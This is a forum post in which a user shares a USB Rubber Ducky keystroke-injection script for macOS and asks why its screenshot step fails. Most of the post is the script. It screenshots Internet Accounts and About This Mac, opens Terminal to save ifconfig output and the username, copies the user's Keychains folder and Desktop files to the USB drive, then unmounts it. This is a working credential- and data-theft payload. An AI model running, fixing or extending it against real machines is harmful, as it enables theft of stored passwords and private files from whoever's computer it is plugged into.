Jump to content

Recommended Posts

Posted

So I have a code I am working on to take a screenshot of the internet accounts and about this mac sections of OSX. Then I have it open up a terminal to write a file ifconfig and then it copys all of this to my Rubber ducky. Think is I cant get the Mac to screen shot. It keeps bypassing it and I think its the way I put it in my code. Here it goes (GUI SHIFT 3) is the code I think needs to be adjusted to take a screen shot.

DELAY 1000
GUI SPACE
DELAY 1000
STRING system preferences
DELAY 2500
ENTER
DELAY 2500
STRING internet accounts
DELAY 2500
ENTER
DELAY 1000
GUI TAB
DELAY 1000
GUI SHIFT 3
DELAY 2000
ENTER
STRING GUI Q
DELAY 2000
GUI SPACE
DELAY 1000
STRING about this Mac
DELAY 1000
ENTER
STRING GUI SHIFT 3
DELAY 1000
STRING GUI Q
DELAY 1000
ENTER
STRING GUI SPACE
DELAY 1000
STRING terminal
DELAY 1000
ENTER
STRING ifconfig > /Volumes/USB/intscan.txt
DELAY 1000
ENTER
STRING id -un > /Volumes/USB/CurrentUSer.txt
DELAY 1000
STRING cp -r ~/Library/Keychains/* /Volumes/USB
DELAY 1000
ENTER
DELAY 1500
STRING cp -r /Users/kali/Desktop/* /Volumes/USB
DELAY 2000
ENTER
STRING diskutil unmountDisk /Volumes/USB && exit
DELAY 1000
GUI Q
ENTER

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...